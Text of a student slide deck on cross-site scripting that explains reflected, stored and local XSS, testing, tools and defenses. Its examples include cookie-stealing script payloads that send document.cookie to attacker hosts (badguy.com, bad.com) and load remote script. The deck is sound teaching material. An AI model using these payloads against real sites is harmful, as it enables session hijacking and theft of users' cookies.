Cross Site Scripting (XSS)
R.SIVA(IV CSE) Cross
�Cross Site Scripting: Outline
Definition Risks Cross Site Scripting Types Testing Tools All Together Defense References
�Definition
Cross Site Scripting (XSS) is a type of computer security exploit where information from one context, where it is not trusted, can be inserted into another context, where it is The trusted website is used to store, transport, or deliver malicious content to the victim The target is to trick the client browser to execute malicious scripting commands JavaScript, VBScript, ActiveX, HTML, or Flash Caused by insufficient input validation.
�Cross Site Scripting Risks
XSS can : Steal cookies Hijack of users session Unauthorized access Modify content of the web page Inserting words or images Misinform Bad reputation Spy on what you do Network Mapping XSS viruses
�Cross Site Scripting Types
Three known types:
Reflected (Non-Persistent)
Link in other website or email
Stored (Persistent)
Forum, bulletin board, feedback form
Local
PDF Adobe Reader , FLASH player
�Reflected (Non-Persistent)
1
Send e-mail with <script> tags embedded in the link.
http://mybank.com/ account.php?variable=><script>document.lo cation=http://www.badguy.com/cgi-bin/ cookie.cgi%20+document.cookie</script>
Follows link and the script executes
2
www.badguy.com Cookie collector
Malicious content dose not get stored in the server The server bounces the original input to the victim without modification
�Stored (Persistent)
Public forum web site
1
Attacker Upload malicious scripting commands to the public forum
Great message! <script> var img=new Image(); img.src= "http://www.bad.com/CookieStealer/ Form1.aspx?s= "+document.cookie; </script>
Downlaod malicious code
Victim
Browse
The server stores the malicious content The server serves the malicious content in its original form
�Local
1
Attacker Send e-mail with a link Http://freeebook.com/ haha.pdf#a=javascript:alert(Boo);
Victim
2
Request for http://freeebook.com/haha.pdf Ignore everything after #
PDF Viewer gets the full URL from browser (including the content after # ) PDF Viewer executes the Javascript.
The injected script does not traverse to the server Arising fast as the major threat as the other two types of XSS are getting fixed
�Cross Site Scripting Testing
Where to start?
Search box Feedback/Guestbook Application forms Look for input that can be displayed back by the site <script>alert(Boo)</script>
Dont forget to test with different encoding scheme
Base64, URL, Unicode
�Cross Site Scripting Tools
N-stalker Acunetix Paros Firefox add-ons
Hackbar XSS ME
�Cross Site Scripting All Together
�Cross Site Scripting All Together
�Cross Site Scripting All Together
�Cross Site Scripting All Together
�Cross Site Scripting All Together
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
�Cross Site Scripting All Together
�Cross Site Scripting Defense
Clint side
Disable JS Verify email Always update
Server side
Input validation (Black listing VS White listing) Encode all meta characters send to the client keep track of user sessions Web application firewall Always test
�Cross Site Scripting: References
RSnake, XSS Cheat Sheet http://ha.ckers.org/xss.html XSS Attack information http://xssed.com/ OWASP Testing for XSS http://www.owasp.org/index.php/Testing_for_Cross_site_scripting Klein, A., DOM Based Cross Site Scripting http://www.webappsec.org/projects/articles/071105.shtml Acunetix web application security http://www.acunetix.com N-stalker http://www.nstalker.com How to use XSS ME http://a4apphack.com/index.php/featured/secfox-xssme-automated-xss-detection-infirefoxpart-3 SANS Web Application Security Workshop
